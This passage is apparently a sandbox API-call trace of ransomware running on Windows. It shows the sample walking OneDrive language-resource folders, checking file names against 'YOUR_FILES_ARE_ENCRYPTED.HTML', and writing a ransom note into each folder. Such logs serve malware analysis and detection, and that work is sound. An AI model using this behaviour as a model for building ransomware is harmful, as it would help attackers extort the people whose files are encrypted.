lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7f48290, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7f48290, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7f48290, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.003] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.003] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\pa\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.003] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.006] CloseHandle (hObject=0x5b8) returned 1 [0162.006] GetProcessHeap () returned 0x270000 [0162.007] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.007] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7f48290, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa815d5d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, 
ftLastWriteTime.dwLowDateTime=0xa815d5d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="pa-arab", cAlternateFileName="")) returned 1 [0162.007] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab") returned 79 [0162.007] GetProcessHeap () returned 0x270000 [0162.007] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.007] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab" [0162.007] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab\\*" [0162.007] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7f48290, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa815d5d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa815d5d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.008] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: 
lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7f48290, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa815d5d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa815d5d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.008] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa815d5d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa815d5d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa815d5d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.008] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab\\FileSync.LocalizedResources.dll.mui") returned 115 [0162.008] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.008] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.008] lstrlenW (lpString=".mui") returned 4 [0162.008] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.008] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa815d5d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa815d5d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa815d5d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, 
nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.008] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.008] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0162.008] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\pa-arab\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.009] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.011] CloseHandle (hObject=0x5b8) returned 1 [0162.012] GetProcessHeap () returned 0x270000 [0162.013] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.013] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa815d5d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8398a70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8398a70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="pa-arab-pk", cAlternateFileName="PA-ARA~1")) returned 1 [0162.013] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk") returned 82 [0162.013] GetProcessHeap () returned 0x270000 [0162.013] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.013] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk" [0162.013] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk\\*" [0162.013] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa815d5d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8398a70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8398a70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.013] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa815d5d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8398a70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8398a70, ftLastWriteTime.dwHighDateTime=0x1d709b9, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.013] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8398a70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8398a70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8398a70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.013] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk\\FileSync.LocalizedResources.dll.mui") returned 118 [0162.013] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.013] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.014] lstrlenW (lpString=".mui") returned 4 [0162.014] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.014] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8398a70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8398a70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8398a70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.014] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.014] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, 
pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0162.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\pa-arab-pk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.014] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.017] CloseHandle (hObject=0x5b8) returned 1 [0162.017] GetProcessHeap () returned 0x270000 [0162.018] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.018] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8398a70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa85fa070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa85fa070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="pl", cAlternateFileName="")) returned 1 [0162.018] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl") returned 74 [0162.018] GetProcessHeap () returned 0x270000 [0162.018] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.018] lstrcpyW (in: lpString1=0x74d2010, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl" [0162.018] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl\\*" [0162.018] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8398a70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa85fa070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa85fa070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.019] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8398a70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa85fa070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa85fa070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.019] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa85fa070, ftCreationTime.dwHighDateTime=0x1d709b9, 
ftLastAccessTime.dwLowDateTime=0xa85fa070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa85fa070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.019] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.019] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.019] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.019] lstrlenW (lpString=".mui") returned 4 [0162.019] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.019] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa85fa070, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa85fa070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa85fa070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.019] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.019] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 
"c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\pl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.020] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.022] CloseHandle (hObject=0x5b8) returned 1 [0162.023] GetProcessHeap () returned 0x270000 [0162.023] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.023] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa85fa070, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="prs-af", cAlternateFileName="")) returned 1 [0162.023] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af") returned 78 [0162.023] GetProcessHeap () returned 0x270000 [0162.023] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.023] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af" [0162.024] lstrcatW (in: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af\\*" [0162.024] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa85fa070, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.024] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa85fa070, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.024] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) 
returned 1 [0162.024] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af\\FileSync.LocalizedResources.dll.mui") returned 114 [0162.024] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.024] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.024] lstrlenW (lpString=".mui") returned 4 [0162.024] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.024] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.024] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.025] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0162.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\prs-af\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.025] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, 
